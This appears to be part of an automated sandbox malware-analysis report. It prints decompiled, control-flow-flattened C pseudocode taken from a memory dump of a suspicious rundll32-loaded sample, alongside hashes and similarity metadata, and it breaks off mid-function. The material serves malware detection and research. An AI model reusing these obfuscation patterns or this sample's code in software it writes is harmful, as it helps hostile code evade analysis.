                                                                                                                      				_v64 = _v64 | 0x5ac15ac1;
                                                                                                                      				_v64 = _v64 ^ 0x94d4ce27;
                                                                                                                      				_v64 = _v64 ^ 0xce05e559;
                                                                                                                      				_v44 = 0x50d454;
                                                                                                                      				_v44 = _v44 * 0x6a;
                                                                                                                      				_v44 = _v44 ^ 0x2175139d;
                                                                                                                      				_v48 = 0x5a75fb;
                                                                                                                      				_v48 = _v48 * 0x57;
                                                                                                                      				_v48 = _v48 ^ 0x1eb14dac;
                                                                                                                      				_v24 = 0x99b258;
                                                                                                                      				_v24 = _v24 << 4;
                                                                                                                      				_v24 = _v24 ^ 0x099f4f84;
                                                                                                                      				_v76 = 0x853d43;
                                                                                                                      				_v76 = _v76 >> 1;
                                                                                                                      				_v76 = _v76 >> 0xe;
                                                                                                                      				_v76 = _v76 | 0x5f7f2022;
                                                                                                                      				_v76 = _v76 ^ 0x5f753756;
                                                                                                                      				_v28 = 0xded29;
                                                                                                                      				_v28 = _v28 | 0xc4be8170;
                                                                                                                      				_v28 = _v28 ^ 0xc4b8b15a;
                                                                                                                      				_v32 = 0x545bb5;
                                                                                                                      				_v32 = _v32 + 0xe4b1;
                                                                                                                      				_v32 = _v32 ^ 0x005c5734;
                                                                                                                      				_v68 = 0xaed47d;
                                                                                                                      				_v68 = _v68 << 0xf;
                                                                                                                      				_v68 = _v68 | 0x1d211fc5;
                                                                                                                      				_v68 = _v68 / _t171;
                                                                                                                      				_v68 = _v68 ^ 0x02801ca0;
                                                                                                                      				_v52 = 0x7d6e82;
                                                                                                                      				_v52 = _v52 >> 0x10;
                                                                                                                      				_v52 = _v52 * 0x56;
                                                                                                                      				_v52 = _v52 ^ 0x0007d38d;
                                                                                                                      				_v72 = 0xcd2745;
                                                                                                                      				_v72 = _v72 ^ 0xed8bacb0;
                                                                                                                      				_v72 = _v72 + 0xffffdf8c;
                                                                                                                      				_v72 = _v72 | 0xe372d41f;
                                                                                                                      				_v72 = _v72 ^ 0xef7557f2;
                                                                                                                      				_v20 = 0x88cfe7;
                                                                                                                      				_v20 = _v20 >> 0xe;
                                                                                                                      				_v20 = _v20 ^ 0x0008c4a6;
                                                                                                                      				_t172 = _v20;
                                                                                                                      				while(_t157 != 0x2c6486) {
                                                                                                                      					if(_t157 == 0x2a600e7) {
                                                                                                                      						E002C4DAD(_v68, _v52, _t172, _v72, _v20);
                                                                                                                      					} else {
                                                                                                                      						if(_t157 == 0xbcc0c39) {
                                                                                                                      							_t153 = E002BEEB8(_v24, _v76, _t172,  *((intOrPtr*)(_t155 + 4)), _t157, _t155 + 4, _v28, _v32,  *_t155);
                                                                                                                      							_t175 =  &(_t175[7]);
                                                                                                                      							_t169 = _t153;
                                                                                                                      							_t157 = 0x2a600e7;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t157 != 0xd3b3a19) {
                                                                                                                      								L9:
                                                                                                                      								if(_t157 != 0xb00d47) {
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t154 = E002CE938(_v36, _v56, _v80, _v60, _v40, _t157, _v64, _v44, _t157, _v48, 0, _t173);
                                                                                                                      								_t172 = _t154;
                                                                                                                      								_t175 =  &(_t175[0xa]);
                                                                                                                      								if(_t154 != 0xffffffff) {
                                                                                                                      									_t157 = 0xbcc0c39;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t169;
                                                                                                                      				}
                                                                                                                      				_t157 = 0xd3b3a19;
                                                                                                                      				goto L9;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$4W\$V7u_
                                                                                                                      • API String ID: 0-1304481894
                                                                                                                      • Opcode ID: 7d0e0d148a11cd35a0702ef9378e6d2ffe14927d1b48726e3f76aff6e6edbe8e
                                                                                                                      • Instruction ID: 00dc27696512f4f0e138ca409e2937f0c752a9da739576e973586253dd97ed6b
                                                                                                                      • Opcode Fuzzy Hash: 7d0e0d148a11cd35a0702ef9378e6d2ffe14927d1b48726e3f76aff6e6edbe8e
                                                                                                                      • Instruction Fuzzy Hash: B4710E710193419FC758CF61C54A91BBBF1FBC5B58F504A0DF2AA9A260D3B28A19CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002D04DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				void* _t114;
                                                                                                                      				void* _t125;
                                                                                                                      				void* _t128;
                                                                                                                      				signed int _t132;
                                                                                                                      				void* _t135;
                                                                                                                      				void* _t148;
                                                                                                                      				signed int* _t151;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t147 = _a8;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t114);
                                                                                                                      				_v60 = 0xcc4817;
                                                                                                                      				_t151 =  &(( &_v96)[5]);
                                                                                                                      				_v60 = _v60 << 8;
                                                                                                                      				_v60 = _v60 ^ 0xcc47e657;
                                                                                                                      				_t148 = 0;
                                                                                                                      				_v68 = 0xe0ed25;
                                                                                                                      				_t135 = 0xdcadf3a;
                                                                                                                      				_v68 = _v68 | 0xce8f6412;
                                                                                                                      				_v68 = _v68 ^ 0xf3afd128;
                                                                                                                      				_v68 = _v68 ^ 0x3d42c27e;
                                                                                                                      				_v72 = 0x9a5a35;
                                                                                                                      				_v72 = _v72 >> 7;
                                                                                                                      				_t132 = 0x47;
                                                                                                                      				_v72 = _v72 * 0x61;
                                                                                                                      				_v72 = _v72 ^ 0x007dafa6;
                                                                                                                      				_v76 = 0x100281;
                                                                                                                      				_v76 = _v76 + 0xffff4995;
                                                                                                                      				_v76 = _v76 ^ 0x3bbc9aa1;
                                                                                                                      				_v76 = _v76 ^ 0x3bbd0b56;
                                                                                                                      				_v84 = 0xc6f502;
                                                                                                                      				_v84 = _v84 / _t132;
                                                                                                                      				_v84 = _v84 >> 1;
                                                                                                                      				_v84 = _v84 | 0x31db5564;
                                                                                                                      				_v84 = _v84 ^ 0x31df2935;
                                                                                                                      				_v88 = 0xec4ee3;
                                                                                                                      				_t44 =  &_v88; // 0xec4ee3
                                                                                                                      				_v88 =  *_t44 * 0x67;
                                                                                                                      				_v88 = _v88 >> 3;
                                                                                                                      				_v88 = _v88 | 0x81ddbea1;
                                                                                                                      				_v88 = _v88 ^ 0x8bf24dda;
                                                                                                                      				_v92 = 0xa20219;
                                                                                                                      				_v92 = _v92 + 0x973c;
                                                                                                                      				_v92 = _v92 | 0xc6adcdd8;
                                                                                                                      				_v92 = _v92 << 0xa;
                                                                                                                      				_v92 = _v92 ^ 0xbf7a6030;
                                                                                                                      				_v96 = 0x474fb;
                                                                                                                      				_v96 = _v96 + 0x4e06;
                                                                                                                      				_v96 = _v96 * 0x4d;
                                                                                                                      				_v96 = _v96 ^ 0xb0fe0c99;
                                                                                                                      				_v96 = _v96 ^ 0xb19d06b7;
                                                                                                                      				_v52 = 0x7e1eaf;
                                                                                                                      				_v52 = _v52 ^ 0x3657a741;
                                                                                                                      				_v52 = _v52 ^ 0x362fc7d5;
                                                                                                                      				_v80 = 0x982156;
                                                                                                                      				_v80 = _v80 >> 1;
                                                                                                                      				_v80 = _v80 * 0x77;
                                                                                                                      				_v80 = _v80 * 0x51;
                                                                                                                      				_v80 = _v80 ^ 0x3002d3c9;
                                                                                                                      				_v56 = 0xfe8a73;
                                                                                                                      				_v56 = _v56 | 0x35e06d03;
                                                                                                                      				_v56 = _v56 ^ 0x35fae637;
                                                                                                                      				_v64 = 0x133817;
                                                                                                                      				_v64 = _v64 | 0xd744828f;
                                                                                                                      				_v64 = _v64 + 0x2427;
                                                                                                                      				_v64 = _v64 ^ 0xd75b1468;
                                                                                                                      				do {
                                                                                                                      					while(_t135 != 0x54f2717) {
                                                                                                                      						if(_t135 == 0x5ba048a) {
                                                                                                                      							_t128 = E002CB9B1(_v84, _v88, __eflags, _t147 + 0x34, _v92,  &_v48, _v96);
                                                                                                                      							_t151 =  &(_t151[4]);
                                                                                                                      							__eflags = _t128;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t135 = 0x54f2717;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t135 == 0xb11095c) {
                                                                                                                      								E002C64C5(_v60, _v68, _v72, _v76, _a4,  &_v48);
                                                                                                                      								_t151 =  &(_t151[4]);
                                                                                                                      								_t135 = 0x5ba048a;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t135 != 0xdcadf3a) {
                                                                                                                      									goto L10;
                                                                                                                      								} else {
                                                                                                                      									_t135 = 0xb11095c;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L11;
                                                                                                                      					}
                                                                                                                      					_t125 = E002CB9B1(_v52, _v80, __eflags, _t147 + 0x10, _v56,  &_v48, _v64);
                                                                                                                      					_t151 =  &(_t151[4]);
                                                                                                                      					__eflags = _t125;
                                                                                                                      					_t148 = (_t125 != 0) ? 1 : _t148;
                                                                                                                      					_t135 = 0xe1bb211;
                                                                                                                      					L10:
                                                                                                                      					__eflags = _t135 - 0xe1bb211;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				L11:
                                                                                                                      				return _t148;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$'$$N
                                                                                                                      • API String ID: 0-2135679241
                                                                                                                      • Opcode ID: 97615591f5f084c9a38ef9eec9de6edeef0eef2f1fdc60eea6539c0a4db16790
                                                                                                                      • Instruction ID: 70bab9cb94167b8b0417bf04a31e5c84622226eff4e6d1759f0f5687bcb2bb83
                                                                                                                      • Opcode Fuzzy Hash: 97615591f5f084c9a38ef9eec9de6edeef0eef2f1fdc60eea6539c0a4db16790
                                                                                                                      • Instruction Fuzzy Hash: 405132B15083829FD758CF21C58681BBBF4FBD8348F505A1EF5A696220D3B1DA598F82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E002C026B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				void* _t108;
                                                                                                                      				void* _t117;
                                                                                                                      				void* _t124;
                                                                                                                      				void* _t126;
                                                                                                                      				void* _t141;
                                                                                                                      				signed int _t142;
                                                                                                                      				signed int _t143;
                                                                                                                      				signed int* _t146;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t140 = _a4;
                                                                                                                      				_t124 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t108);
                                                                                                                      				_v92 = 0x51c9e1;
                                                                                                                      				_t146 =  &(( &_v96)[5]);
                                                                                                                      				_v92 = _v92 << 4;
                                                                                                                      				_t141 = 0;
                                                                                                                      				_t126 = 0x4bb83f6;
                                                                                                                      				_t142 = 0x49;
                                                                                                                      				_v92 = _v92 * 0x6e;
                                                                                                                      				_v92 = _v92 + 0x829d;
                                                                                                                      				_v92 = _v92 ^ 0x32495c11;
                                                                                                                      				_v68 = 0x73c01f;
                                                                                                                      				_v68 = _v68 + 0x1dcd;
                                                                                                                      				_v68 = _v68 ^ 0x00720d8f;
                                                                                                                      				_v96 = 0xb49fc9;
                                                                                                                      				_v96 = _v96 + 0x43a3;
                                                                                                                      				_v96 = _v96 ^ 0x15acb626;
                                                                                                                      				_v96 = _v96 << 0x10;
                                                                                                                      				_v96 = _v96 ^ 0x554d7300;
                                                                                                                      				_v84 = 0x939dbf;
                                                                                                                      				_v84 = _v84 >> 0xf;
                                                                                                                      				_v84 = _v84 / _t142;
                                                                                                                      				_v84 = _v84 ^ 0x000cd20a;
                                                                                                                      				_v60 = 0xb12a06;
                                                                                                                      				_v60 = _v60 | 0x23fd9b15;
                                                                                                                      				_v60 = _v60 ^ 0x23fc0752;
                                                                                                                      				_v76 = 0x2839ff;
                                                                                                                      				_v76 = _v76 + 0xfffff40d;
                                                                                                                      				_v76 = _v76 << 4;
                                                                                                                      				_v76 = _v76 ^ 0x0280e51a;
                                                                                                                      				_v80 = 0xa0e526;
                                                                                                                      				_v80 = _v80 | 0xbc5e80d8;
                                                                                                                      				_v80 = _v80 >> 7;
                                                                                                                      				_v80 = _v80 ^ 0x017df397;
                                                                                                                      				_v64 = 0xa3347;
                                                                                                                      				_t143 = 0x14;
                                                                                                                      				_v64 = _v64 * 0x36;
                                                                                                                      				_v64 = _v64 ^ 0x02285917;
                                                                                                                      				_v88 = 0x8f496e;
                                                                                                                      				_v88 = _v88 + 0x138c;
                                                                                                                      				_v88 = _v88 + 0x9d7d;
                                                                                                                      				_v88 = _v88 / _t143;
                                                                                                                      				_v88 = _v88 ^ 0x000c7ae1;
                                                                                                                      				_v72 = 0x3c508e;
                                                                                                                      				_v72 = _v72 ^ 0xe86d4278;
                                                                                                                      				_v72 = _v72 | 0x3236ed5f;
                                                                                                                      				_v72 = _v72 ^ 0xfa734a26;
                                                                                                                      				_v52 = 0x119dd9;
                                                                                                                      				_v52 = _v52 ^ 0x40537751;
                                                                                                                      				_v52 = _v52 ^ 0x404ccff2;
                                                                                                                      				_v56 = 0x89ec9d;
                                                                                                                      				_v56 = _v56 ^ 0xd17cb195;
                                                                                                                      				_v56 = _v56 ^ 0xd1fa716b;
                                                                                                                      				do {
                                                                                                                      					while(_t126 != 0x360725a) {
                                                                                                                      						if(_t126 == 0x4bb83f6) {
                                                                                                                      							_t126 = 0x9f53cee;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t126 == 0x6abf560) {
                                                                                                                      								__eflags = E002CB9B1(_v88, _v72, __eflags, _t140 + 4, _v52,  &_v48, _v56);
                                                                                                                      								_t141 =  !=  ? 1 : _t141;
                                                                                                                      							} else {
                                                                                                                      								if(_t126 != 0x9f53cee) {
                                                                                                                      									goto L10;
                                                                                                                      								} else {
                                                                                                                      									E002C64C5(_v92, _v68, _v96, _v84, _t124,  &_v48);
                                                                                                                      									_t146 =  &(_t146[4]);
                                                                                                                      									_t126 = 0x360725a;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L13:
                                                                                                                      						return _t141;
                                                                                                                      					}
                                                                                                                      					_t117 = E002BB09F(_v60, _v76,  &_v48, _v80, _t140, _v64);
                                                                                                                      					_t146 =  &(_t146[4]);
                                                                                                                      					__eflags = _t117;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t126 = 0x3e1d0be;
                                                                                                                      						goto L10;
                                                                                                                      					} else {
                                                                                                                      						_t126 = 0x6abf560;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L13;
                                                                                                                      					L10:
                                                                                                                      					__eflags = _t126 - 0x3e1d0be;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L13;
                                                                                                                      			}

























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: G3$QwS@$_62
                                                                                                                      • API String ID: 0-451131340
                                                                                                                      • Opcode ID: 3902cee3783e2c7279a12e7e0d5481830c8a8355854c33fa136e91049aa61468
                                                                                                                      • Instruction ID: f6922792759cd4d6987aefe2bbf9276fba7400ada985c9385d4a1f281e4fc5e8
                                                                                                                      • Opcode Fuzzy Hash: 3902cee3783e2c7279a12e7e0d5481830c8a8355854c33fa136e91049aa61468
                                                                                                                      • Instruction Fuzzy Hash: 475184711183459FC398DF20C58A82BBBE1FBC4798F500A1DF692A2221D3B1DA588B83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002C3D41(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				char _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				void* _t102;
                                                                                                                      				void* _t110;
                                                                                                                      				void* _t115;
                                                                                                                      				void* _t117;
                                                                                                                      				void* _t119;
                                                                                                                      				void* _t132;
                                                                                                                      				signed int _t133;
                                                                                                                      				signed int* _t136;
                                                                                                                      
                                                                                                                      				_t131 = _a8;
                                                                                                                      				_t117 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t102);
                                                                                                                      				_v64 = 0x9e44de;
                                                                                                                      				_t136 =  &(( &_v100)[4]);
                                                                                                                      				_v64 = _v64 >> 6;
                                                                                                                      				_v64 = _v64 ^ 0x000cb772;
                                                                                                                      				_t132 = 0;
                                                                                                                      				_v84 = 0x342048;
                                                                                                                      				_t119 = 0x9e632dd;
                                                                                                                      				_v84 = _v84 << 2;
                                                                                                                      				_t133 = 0x77;
                                                                                                                      				_v84 = _v84 / _t133;
                                                                                                                      				_v84 = _v84 ^ 0x00050c4a;
                                                                                                                      				_v68 = 0xcb0a16;
                                                                                                                      				_v68 = _v68 * 0x2c;
                                                                                                                      				_v68 = _v68 ^ 0x22ee5bf9;
                                                                                                                      				_v88 = 0x6d370;
                                                                                                                      				_v88 = _v88 << 2;
                                                                                                                      				_v88 = _v88 + 0xffff4ba7;
                                                                                                                      				_v88 = _v88 ^ 0x0017e1fc;
                                                                                                                      				_v96 = 0xa9311c;
                                                                                                                      				_v96 = _v96 + 0x677e;
                                                                                                                      				_v96 = _v96 << 6;
                                                                                                                      				_v96 = _v96 >> 1;
                                                                                                                      				_v96 = _v96 ^ 0x1536caa9;
                                                                                                                      				_v92 = 0x3ec146;
                                                                                                                      				_v92 = _v92 >> 1;
                                                                                                                      				_v92 = _v92 << 4;
                                                                                                                      				_v92 = _v92 ^ 0x01fa5034;
                                                                                                                      				_v100 = 0xc8b468;
                                                                                                                      				_v100 = _v100 + 0xabff;
                                                                                                                      				_v100 = _v100 + 0x496c;
                                                                                                                      				_v100 = _v100 << 3;
                                                                                                                      				_v100 = _v100 ^ 0x064ce6e5;
                                                                                                                      				_v72 = 0x40c3e5;
                                                                                                                      				_v72 = _v72 + 0xe4b1;
                                                                                                                      				_v72 = _v72 ^ 0x00481562;
                                                                                                                      				_v76 = 0xf7b9fc;
                                                                                                                      				_v76 = _v76 ^ 0x04753abe;
                                                                                                                      				_v76 = _v76 >> 8;
                                                                                                                      				_v76 = _v76 ^ 0x00058483;
                                                                                                                      				_v56 = 0xab3e00;
                                                                                                                      				_v56 = _v56 * 0x42;
                                                                                                                      				_v56 = _v56 ^ 0x2c2f6e9b;
                                                                                                                      				_v80 = 0x8577d2;
                                                                                                                      				_v80 = _v80 | 0xb985653c;
                                                                                                                      				_v80 = _v80 << 0xe;
                                                                                                                      				_v80 = _v80 ^ 0x5dfa230b;
                                                                                                                      				_v60 = 0xdce2c4;
                                                                                                                      				_v60 = _v60 | 0x5395b845;
                                                                                                                      				_v60 = _v60 ^ 0x53d3ec0c;
                                                                                                                      				while(_t119 != 0x979dba8) {
                                                                                                                      					if(_t119 == 0x9e632dd) {
                                                                                                                      						_t119 = 0xa2b72cf;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						if(_t119 == 0xa2b72cf) {
                                                                                                                      							E002C64C5(_v64, _v84, _v68, _v88, _t117,  &_v52);
                                                                                                                      							_t136 =  &(_t136[4]);
                                                                                                                      							_t119 = 0xe5d0333;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t119 != 0xe5d0333) {
                                                                                                                      								L10:
                                                                                                                      								__eflags = _t119 - 0xfc63b9d;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t115 = E002BB09F(_v96, _v92,  &_v52, _v100, _t131 + 0xc, _v72);
                                                                                                                      								_t136 =  &(_t136[4]);
                                                                                                                      								if(_t115 != 0) {
                                                                                                                      									_t119 = 0x979dba8;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t132;
                                                                                                                      				}
                                                                                                                      				_t110 = E002CB9B1(_v76, _v56, __eflags, _t131 + 0x10, _v80,  &_v52, _v60);
                                                                                                                      				_t136 =  &(_t136[4]);
                                                                                                                      				__eflags = _t110;
                                                                                                                      				_t132 =  !=  ? 1 : _t132;
                                                                                                                      				_t119 = 0xfc63b9d;
                                                                                                                      				goto L10;
                                                                                                                      			}

























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: H 4$lI$~g
                                                                                                                      • API String ID: 0-1574228674
                                                                                                                      • Opcode ID: 423323af2e26e23c72106b1dc1ca73f18f5a7f0c7bd7cdbd74780325d6629f41
                                                                                                                      • Instruction ID: da3454f49b3f7308e5f61db83e9e0b02070a0915c59fc7733673cb7e8e4829ee
                                                                                                                      • Opcode Fuzzy Hash: 423323af2e26e23c72106b1dc1ca73f18f5a7f0c7bd7cdbd74780325d6629f41
                                                                                                                      • Instruction Fuzzy Hash: 185143B15183419FC758CF25888982BBBF5FBD8748F408E1DF99696260C3B1CA19CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002B6A1F(void* __ecx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				void* _t133;
                                                                                                                      				void* _t137;
                                                                                                                      				signed int _t139;
                                                                                                                      				signed int _t140;
                                                                                                                      				signed int _t141;
                                                                                                                      				intOrPtr _t158;
                                                                                                                      				intOrPtr* _t159;
                                                                                                                      				intOrPtr* _t160;
                                                                                                                      				void* _t161;
                                                                                                                      
                                                                                                                      				_t158 =  *0x2d5c94; // 0x0
                                                                                                                      				_v8 = 0x584755;
                                                                                                                      				_t137 = __ecx;
                                                                                                                      				_t2 =  &_v8; // 0x584755
                                                                                                                      				_t159 = _t158 + 0x230;
                                                                                                                      				_t139 = 0x64;
                                                                                                                      				_v8 =  *_t2 * 0x67;
                                                                                                                      				_v8 = _v8 + 0xffff4b67;
                                                                                                                      				_v8 = _v8 ^ 0xe76daef6;
                                                                                                                      				_v8 = _v8 ^ 0xc4ee506c;
                                                                                                                      				_v28 = 0x9e8b87;
                                                                                                                      				_v28 = _v28 + 0x75d;
                                                                                                                      				_v28 = _v28 / _t139;
                                                                                                                      				_v28 = _v28 ^ 0x00079f8c;
                                                                                                                      				_v24 = 0xc311ab;
                                                                                                                      				_v24 = _v24 + 0xffffbeea;
                                                                                                                      				_v24 = _v24 | 0xf92f35a0;
                                                                                                                      				_v24 = _v24 ^ 0xf9e35170;
                                                                                                                      				_v44 = 0x977698;
                                                                                                                      				_v44 = _v44 + 0x51f5;
                                                                                                                      				_v44 = _v44 ^ 0x0096f96a;
                                                                                                                      				_v32 = 0xe7cab8;
                                                                                                                      				_v32 = _v32 | 0xaa1208f4;
                                                                                                                      				_t140 = 0x17;
                                                                                                                      				_v32 = _v32 / _t140;
                                                                                                                      				_v32 = _v32 ^ 0x076e046c;
                                                                                                                      				_v12 = 0x2eec3f;
                                                                                                                      				_v12 = _v12 + 0xffffb819;
                                                                                                                      				_v12 = _v12 + 0xffff37c9;
                                                                                                                      				_t141 = 0x68;
                                                                                                                      				_v12 = _v12 / _t141;
                                                                                                                      				_v12 = _v12 ^ 0x000eef91;
                                                                                                                      				_v56 = 0x530307;
                                                                                                                      				_v56 = _v56 | 0x0fbda9c8;
                                                                                                                      				_v56 = _v56 ^ 0x0ffdd502;
                                                                                                                      				_v52 = 0x5d35c5;
                                                                                                                      				_v52 = _v52 + 0xd27c;
                                                                                                                      				_v52 = _v52 ^ 0x0055f8de;
                                                                                                                      				_v48 = 0x6ef6d5;
                                                                                                                      				_v48 = _v48 >> 1;
                                                                                                                      				_v48 = _v48 ^ 0x0035703d;
                                                                                                                      				_v16 = 0x82f5d;
                                                                                                                      				_v16 = _v16 << 0xd;
                                                                                                                      				_v16 = _v16 + 0xa18d;
                                                                                                                      				_v16 = _v16 + 0xffffcd20;
                                                                                                                      				_v16 = _v16 ^ 0x05eb1b3e;
                                                                                                                      				_v20 = 0xcf26b;
                                                                                                                      				_v20 = _v20 | 0xbebffeb7;
                                                                                                                      				_v20 = _v20 ^ 0xbebf7f31;
                                                                                                                      				_v60 = 0x60d0b7;
                                                                                                                      				_v60 = _v60 >> 2;
                                                                                                                      				_v60 = _v60 ^ 0x0017c790;
                                                                                                                      				_v40 = 0xb2c22;
                                                                                                                      				_v40 = _v40 ^ 0x2c2f8cde;
                                                                                                                      				_v40 = _v40 + 0xffffbcf4;
                                                                                                                      				_v40 = _v40 ^ 0x2c2f98f1;
                                                                                                                      				_v36 = 0x14b711;
                                                                                                                      				_v36 = _v36 >> 0xd;
                                                                                                                      				_v36 = _v36 | 0x6b3fd2c1;
                                                                                                                      				_v36 = _v36 ^ 0x6b3a1312;
                                                                                                                      				while(1) {
                                                                                                                      					_t160 =  *_t159;
                                                                                                                      					if(_t160 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					if( *((intOrPtr*)(_t160 + 0x30)) == 0) {
                                                                                                                      						L4:
                                                                                                                      						 *_t159 =  *_t160;
                                                                                                                      						_t133 = E002B68DE(_v20, _v60, _v40, _v36, _t160);
                                                                                                                      						_t161 = _t161 + 0xc;
                                                                                                                      					} else {
